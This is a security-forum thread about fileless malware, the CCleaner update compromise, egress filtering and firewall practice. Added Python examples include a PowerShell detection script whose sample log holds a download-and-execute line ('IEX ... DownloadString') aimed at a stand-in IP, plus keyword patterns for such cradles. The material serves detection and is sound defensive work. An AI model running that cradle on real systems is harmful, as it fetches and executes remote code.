Fileless malware: Invisible threat or scaremongering hype?

Poll: Are you worried about Fileless Malware? (closed, 67 voters)

  • Yes: 22 votes (32.8%)
  • No: 36 votes (53.7%)
  • No, because I use Emsisoft AM: 9 votes (13.4%)

boredog

Level 9
Verified
Jul 5, 2016
416
We've got secured clients with egress limitations.

What that means is - XYZ corporation has their internal structure. DNS/DHCP/AD environment, maybe 3, 4, 5 or so Hypers running this or that. On-Prem AV server on one of the Hypers serving local signature updates to security programs. Then additionally, they have egress restrictions in place. 'You can go to these 100 websites only. Period. End of story'. Those 100 websites were ones deemed absolutely necessary for the operation of the day to day business of the secured facility. End of story. Firms that do this aren't going to get infected from any external source under almost all conditions. With further GPOs for USB restrictions and/or hot glue shot into the USB ports, that vector is now closed. Toss an active APT appliance on the network behind the UTM, RogueAP Suppression unit and you are good to go.

Egress restriction or egress monitoring is the foundation of strong security and security facilities. Any potential attacker is very limited in getting in, but more importantly getting out!

What is the e-mail setup like or are they not allowed to use e-mail?
 

ForgottenSeer 58943

Thread author
What is the e-mail setup like or are they not allowed to use e-mail?

OnPrem exchange w/HES filtration, attachment restrictions. (Size, Type, etc) Sandboxing of attachments with delayed release. Link stripping in emails.
 

JChris

Level 1
Verified
Oct 1, 2017
24
Fileless attacks don't mean IOCless attacks :)

A clear example is PowerShell-based attacks where the victim only needs to execute a given line of code, no files needed. It's fileless, but it's not IOCless, as we will have logs for network connections back to the C2, logs for PS execution (if properly configured via GPO) and so on.
 
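The point above, that a PowerShell one-liner still leaves process, script-block and network logs, as an added example (not JChris's code and not from any product): a Python correlation over constructed Sysmon-style and Event ID 4104 records. The event schema, field names and keyword lists are assumptions made for this example.

```python
import base64
import re
from datetime import datetime, timedelta

# Constructed sample records (not from any real host). Field names mimic
# Sysmon process-create (1), network-connect (3) and PowerShell script-block
# (4104) events; the exact schema is an assumption for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode("Write-Host test".encode("utf-16le")).decode()
EVENTS = [
    {"ts": "2017-10-01T09:00:00", "id": 1, "pid": 4120, "image": PS,
     "cmd": "powershell.exe -nop -w hidden -enc " + ENC},
    {"ts": "2017-10-01T09:00:02", "id": 4104, "pid": 4120,
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"},
    {"ts": "2017-10-01T09:00:03", "id": 3, "pid": 4120, "image": PS,
     "dst": "203.0.113.7", "dport": 443},
    {"ts": "2017-10-01T09:05:00", "id": 1, "pid": 5000, "image": PS,
     "cmd": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ts": "2017-10-01T09:05:01", "id": 3, "pid": 5000, "image": PS,
     "dst": "10.0.0.5", "dport": 445},
]

# Command-line switches and script-block keywords typical of fileless
# PowerShell execution; a tuned list belongs in GPO/SIEM content, not here.
SUSPICIOUS_CMD = re.compile(r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b", re.I)
SUSPICIOUS_SCRIPT = re.compile(r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|FromBase64String", re.I)


def decode_encoded_command(cmd):
    """Return the plaintext of a -enc/-EncodedCommand argument, or None."""
    tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(events, window=timedelta(seconds=30)):
    """Correlate suspicious PowerShell launches and script blocks with
    outbound connections from the same PID; one finding per connection."""
    tracked = {}  # pid -> (start time, list of reasons)
    findings = []
    for e in sorted(events, key=lambda x: x["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["id"] == 1 and e["image"].lower().endswith("powershell.exe"):
            reasons = [m.group(0) for m in SUSPICIOUS_CMD.finditer(e["cmd"])]
            decoded = decode_encoded_command(e["cmd"])
            if decoded is not None:
                reasons.append("decoded: " + decoded)
            if reasons:
                tracked[e["pid"]] = (ts, reasons)
        elif e["id"] == 4104 and e["pid"] in tracked:
            hits = [m.group(0) for m in SUSPICIOUS_SCRIPT.finditer(e["script"])]
            tracked[e["pid"]][1].extend("script: " + h for h in hits)
        elif e["id"] == 3 and e["pid"] in tracked:
            start, reasons = tracked[e["pid"]]
            if ts - start <= window:  # connection shortly after the launch
                findings.append({"pid": e["pid"], "dst": f"{e['dst']}:{e['dport']}",
                                 "reasons": list(reasons)})
    return findings
```

The benign scheduled script (PID 5000) produces no finding because its launch carries none of the flagged switches, which is why the correlation keys on the process record rather than on the network event alone.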

Deleted member 65228

Thread author
But that is not the case with MT users
Recently someone walked onto this forum to promote their anti-ransomware product which was suspicious in the sense that it was deceptive in the detections (fake detections). Simply because it was being promoted on this forum and because it was allegedly entirely free, not many people at all raised suspicion it appeared... Until I took a lot out of suspicion and posted an analysis on the very thread everyone was reading. A few days later I got a response from Avast notifying me they found it to be deceptor-like and have added a detection for it being malicious, and the thread was removed after I reported it.

That speaks for itself... People seem to trust what they read on forums like this more than other sources, and the right approach from an attacker will be capable of socially engineering anyone. Even corporate companies who work in the security industry have been fooled, I mean the CCleaner thing was very interesting because the breach wasn't recognised for at least a few weeks (of course this was not Avast's fault like some think though, they did everything they could after it was reported to them about suspicious activity).

File-less attacks are real, the threat is real... And social engineering is a huge threat to all of us because people who are good at it will design their approaches in a way to meddle with our brain mechanics, attempt to grab information from us without raising noticeable alarm/fool us into doing something which we wouldn't have normally done maybe. Especially for a business, an attacker may social engineer multiple employees for information which can be used to help them successfully deploy a sophisticated attack.
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,716
These sorts of attacks will usually always surpass your protection. The key is that it was from reputable trusted and signed software.

Well, there is the option to straight firewall block connections for an application(s). Also, there are some good updater programs that can help make it more plausible to shut down these connections. Found this list:

12 Free Programs That Help Keep Your Software Updated

I've been using PortableApps which updates the programs on a regular basis. I just have the program's connection requests blocked (Comodo) which surprisingly does block a good bit of traffic and brings some peace of mind about internet connections. I also make use of the "Ask" option in CFW for a good many programs that I want to see an alert for because the program might be little known or whatever. Just one way to keep an eye on an app without having to survey the logs constantly...
 

Deleted member 65228

Thread author
Well, there is the option to straight block connections for an application(s). There are some good updater programs that can help make it more plausible to shut down these connections.
You're 100% right about that, but CCleaner is (*was*) reputable and is generally (*was*) trusted software. Therefore most people would have probably had it white-listed, preventing a firewall from intervening with the connections. Maybe someone paranoid would have put a restriction up or blocked the automatic updates entirely, but I doubt many would have done this at all in comparison to the millions that had it installed and were actively using it.

This sort of attack can happen to many other companies as well, any software that queries to a network/has auto-update functionality can be hijacked with a similar/same technique.

Manually updating is a step in the right direction say on case but I doubt a majority would do this, only people who are focused on security a lot (e.g. maybe a few here like yourself). General home users with inexperience or probably businesses as well would have left it to auto-update because of the reputation it had, especially after it was acquired by Avast!
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,716
You're 100% right about that, but CCleaner is (*was*) reputable and is generally (*was*) trusted software. Therefore most people would have probably had it white-listed, preventing a firewall from intervening with the connections. Maybe someone paranoid would have put a restriction up or blocked the automatic updates entirely, but I doubt many would have done this at all in comparison to the millions that had it installed and were actively using it.

You are 100% right. Every reason here to go with the trimmed Trusted Vendors List in Comodo. I recommend doing this even though it's a hassle, and o/c most wouldn't even realize where the TVL is to change it. BTW, trimming the TVL is pointless without turning off Cloud Lookup. Comodo will just add the vendor for programs like CCleaner, once the program is detected on the system. That means the program is 100% free to roam and do as it pleases. However, seems that Comodo Firewall (Firewall element in Custom mode) does give the user at least one initial alert automatically. Then it will continue to alert new connection attempts until the user chooses "Remember". I think this is correct. In that case, the rule can be in place for the main application before Cloud Lookup adds the vendor (Avast). The user can choose to block and remember at that point and the installer won't even make it to the drive.

Wow, one weird thing I just realized. If the new CCleaner sig is from Avast, I have that in my trimmed list on another PC because it's running Avast. A security company owning an app adds a little bit of a strange dynamic there. For sure, there should be a special signature designation for a non-security app I guess...

I would like to know if the rogue CCleaner installer connection with the trusted vendor there or not there would have been contained by CFW or maybe blocked by Heuristic Command-line. That would be an interesting thing to see but I fear that might be the one that gets by Comodo even with the trimmed TVL and no Cloud Lookup. Maybe the HC-L would kick in but I don't think so. HIPS might go off in safe mode. Actually I think it would, but the only chance to block the CCleaner installer episode (installer already on the PC) using Comodo would have been the net connection of the main app I think...
 

Deleted member 65228

Thread author
@AtlBo Now I think about it, thanks to your points, I thought of an idea I think is actually quite good - problem is maintenance and I doubt it'll ever be done anytime soon at least. Companies who provide software should opt-in with security vendors (including Microsoft) to automatically block connections to hosts within their software which have not been verified by the company prior to the update.

For ex... I'll use CCleaner for the ex.
1. CCleaner new version will connect to a new host for an update after a server migration. The update is ready to roll out.
2. Avast/Piriform (now owned by Avast) submit the host to multiple vendors with a click. Because Avast are a security vendor.
3. Now if CCleaner attempts to make a connection anywhere else other than it is supposed to, hand-submitted by the vendor to the server of multiple security vendors automatically, the connection is automatically blocked.

It can be flawed due to zero-day exploitation of a firewall product / techniques like code injection to use another trusted process to do the dirty work, but it would make things a lot harder. This would have mitigated this specific attack we recently spectated with CCleaner, making it a lot harder (e.g. either find a way to submit on their behalf, or use a technique to prevent detection like code injection into a trusted process -> which may be picked up by dynamic protection components anyway).

They could at-least have a public list for people to add to allow, block all other connections from the software's processes automatically. Like an adblocker but auto-block by default for a program -> DB automatically retrieved at run-time so the latest used domains can be used for connections in the software, everything else auto-blocked as it wouldn't be necessary unless specified on the public list owned by the vendor for that software.
 
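The vendor-published host list proposed above, together with the per-program egress restriction boredog described earlier in the thread, as an added example (not the poster's code and not any vendor's): a Python default-deny egress policy with a review tally for the blocked attempts. The host names, list format and function names are hypothetical.

```python
import fnmatch
from collections import Counter

# Constructed policy for this example (hypothetical host names, not any real
# vendor's). A program may reach only the hosts its vendor published for it,
# plus a short site-wide list; every other destination is denied by default.
VENDOR_LISTS = {
    "ccleaner.exe": ["update.example-vendor.test", "*.cdn.example-vendor.test"],
    "browser.exe": ["*.example-browser.test"],
}
SITE_ALLOW = ["intranet.corp.test", "mail.corp.test"]  # the "100 websites"


def host_allowed(host, patterns):
    """Case-insensitive match; '*' covers any subdomain depth (fnmatch)."""
    return any(fnmatch.fnmatchcase(host.lower(), p.lower()) for p in patterns)


def decide(process, host, vendor_lists=VENDOR_LISTS, site_allow=SITE_ALLOW):
    """Return ('allow' | 'block', reason) for one outbound connection."""
    prog, host = process.lower(), host.lower()
    if host_allowed(host, site_allow):
        return "allow", "site-wide list"
    if prog not in vendor_lists:
        return "block", f"no published list for {prog}"
    if host_allowed(host, vendor_lists[prog]):
        return "allow", f"vendor list for {prog}"
    return "block", f"{host} not in vendor list for {prog}"


def review(connections):
    """Egress monitoring: tally blocked (program, host) pairs so a trusted
    program suddenly reaching a new host stands out for investigation."""
    blocked = Counter()
    for process, host in connections:
        verdict, _ = decide(process, host)
        if verdict == "block":
            blocked[(process.lower(), host.lower())] += 1
    return blocked


# Constructed connection log: (process, destination host).
CONNECTIONS = [
    ("ccleaner.exe", "update.example-vendor.test"),     # expected update check
    ("ccleaner.exe", "files.cdn.example-vendor.test"),  # matches the wildcard
    ("ccleaner.exe", "stats.unknown-host.test"),        # new host: blocked
    ("ccleaner.exe", "stats.unknown-host.test"),
    ("browser.exe", "mail.corp.test"),                  # site-wide allow
    ("notepad.exe", "www.example-browser.test"),        # unlisted program
]
# Caveat raised in the thread: the decision is per process, so code running
# inside an allowed process inherits its list; pair this with process controls.
```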

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,716
For ex... I'll use CCleaner for the ex.

Like a list of clean IPs maybe that could be used by a-v/security similar to signatures? Good idea. Lots of the app devs use like Cloud Front or some other server host for their updates, so I guess they might not completely control the IP range of their updates. Not sure how that might work. Even security vendors do this like Qihoo who uses Amazon...or last time I checked do.

You are correct, does seem like a lot can be done in this area. I have actually been wondering if a site like IP Void might become the next Virus Total but for internet connections. A little bit different topic but would we end up seeing a Voodoo Shield firewall of the internet? Kind of a cool thought but maybe IPs would be tougher to police and keep up with than file sigs. Who knows, I guess someone could become interested and invest in such a way of doing things...

The many dozen other ones don't so I simply blocked em in firewall settings, issue solved

Yeah, this was my thinking too. I came to the conclusion it wasn't worth the risk leaving the program open that way. For me, the side benefit has been the decreased traffic which seems much more manageable to me now. I feel like I can even police local and outbound IPv6 with the decrease in outbound/inbound from apps...
 

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,716
After the CCleaner incident, I took a look and it turns out that the only programs I have on my pc that require internet connection to work are sumo, dumo, dashlane, chrome, qbittorrent, some microsoft things, skype, teamspeak, online games, and some security software.

A good idea is to set MS apps set to "Ask" in the firewall element in Comodo FW. Good way to keep up with what's happening. Setting cmd.exe to ask means getting a chance to block rogue attempts to use that interface for running script/code for malicious downloads, etc. Also, have it set for taskeng.exe, taskhost.exe, WinSat.exe, explorer.exe, runonce.exe, cscript.exe (if wscript ever alerts I will set the rule to ask)...
 

Deleted member 65228

Thread author
A little bit different topic but would we end up seeing a Voodoo Shield firewall of the internet?
I doubt it because it would be too difficult for a normal person to use properly. Alerts coming left right and centre. Auto-block = now problems with programs functioning. Anti-executable is good but only experienced people use it if they can be bothered to keep up with alerts or don't install much, normal home users won't use something like that, they want auto-resolve. But anti-exe works well still because it is before execution. After execution happens, anything can happen.

But I like the idea if it could be pulled off in an elegant way :) same for my other idea, but I doubt it could be pulled off elegantly anytime soon at least
 

ForgottenSeer 58943

Thread author
I was considering this method. Unfortunately those apps are being updated by volunteers and as a result some are weeks, even months behind the actual version.

Portable Apps are crucial. No external connectivity required or even on in most cases. Let's face it, do you really need to update Bleachbit all of the time? You don't, it works perfectly fine for years without updates. Unzip a hash verified version, toss it into a folder, pin a shortcut to it and leave it alone - for a year or two and close off that vector of compromise permanently. So simple, so powerful.

As for the Ccleaner thing. I used a combination of Ccleaner and Agomo(CC Cloud) until around May of this year. Then at the end of May (possibly early June) my APT Appliance (FortiSandbox) flagged it as a new, high risk threat after it bounced it around in the sandbox. At that point I immediately cancelled CC-Cloud subscription, and removed Ccleaner from all machines. It turns out, I dodged the bullet on that by paying close attention to a very powerful APT appliance. Recently, I discovered Private Internet Access (PIA) was serving an EXE Injector on their custom installer. FortiSandbox (APT) flagged it for the first time. Crazy right? It happens and I believe these update channel compromises are going to become more common.

Having an APT appliance in the home is powerful. Someday I will post one of the 50 page analysis outputs it generates. Currently every file/program/script/webpage coming into my network is APT scanned. I'm taking NO chances.
 

boredog

Level 9
Verified
Jul 5, 2016
416
Recently someone walked onto this forum to promote their anti-ransomware product which was suspicious in the sense that it was deceptive in the detections (fake detections). Simply because it was being promoted on this forum and because it was allegedly entirely free, not many people at all raised suspicion it appeared... Until I took a lot out of suspicion and posted an analysis on the very thread everyone was reading. A few days later I got a response from Avast notifying me they found it to be deceptor-like and have added a detection for it being malicious, and the thread was removed after I reported it.

That speaks for itself... People seem to trust what they read on forums like this more than other sources, and the right approach from an attacker will be capable of socially engineering anyone. Even corporate companies who work in the security industry have been fooled, I mean the CCleaner thing was very interesting because the breach wasn't recognised for at least a few weeks (of course this was not Avast's fault like some think though, they did everything they could after it was reported to them about suspicious activity).

File-less attacks are real, the threat is real... And social engineering is a huge threat to all of us because people who are good at it will design their approaches in a way to meddle with our brain mechanics, attempt to grab information from us without raising noticeable alarm/fool us into doing something which we wouldn't have normally done maybe. Especially for a business, an attacker may social engineer multiple employees for information which can be used to help them successfully deploy a sophisticated attack.

I remember that thread. When I told him MS didn't like it, all he said was the detections were FPs. I installed it in Shadow Defender because I thought it looked suspicious.
 

ForgottenSeer 58943

Thread author

Will I ever update bleachbit? Sure.. Eventually. But why worry about it when it's portable on an isolated stick and only executed every few weeks for a few seconds on each machine? None of these vulns would even be applicable in that situation.
 

Arequire

Level 29
Verified
Top Poster
Content Creator
Feb 10, 2017
1,822
This sort of attack can happen to many other companies as well, any software that queries to a network/has auto-update functionality can be hijacked with a similar/same technique.
I'm wondering how long it'll take until someone breaks into the Windows update servers, laces an update with malicious code and Microsoft doesn't notice and pushes the update to everyone. Hundreds of millions - if not billions by that time - of systems crippled. Scary prospect.
Also curious how the planet would react to such a scenario.
 

ForgottenSeer 58943

Thread author
I'm wondering how long it'll take until someone breaks into the Windows update servers, laces an update with malicious code and Microsoft doesn't notice and pushes the update to everyone. Hundreds of millions - if not billions by that time - of systems crippled. Scary prospect.
Also curious how the planet would respond to such a scenario.

I'm rolling with the assumption the Windows Update channel may already be compromised and there is nothing we can do about it. My migrations to secured Linux or alternative OSs are going very slowly, painstaking in some cases, so until that is complete that fear will still be there.
 

Arequire

Level 29
Verified
Top Poster
Content Creator
Feb 10, 2017
1,822
I'm rolling with the assumption the Windows Update channel may already be compromised and there is nothing we can do about it. My migrations to secured Linux or alternative OSs are going very slowly, painstaking in some cases, so until that is complete that fear will still be there.
With all the crapware Microsoft's shovelled down its users' throats over the years using Windows Update, I guess you could say it's always been compromised somewhat.

I generally leave it a good couple of weeks before I install Windows updates just in case there's any news about said updates turning systems into paperweights, so hopefully if there is a malicious update pushed I'll get wind before I install it.
 
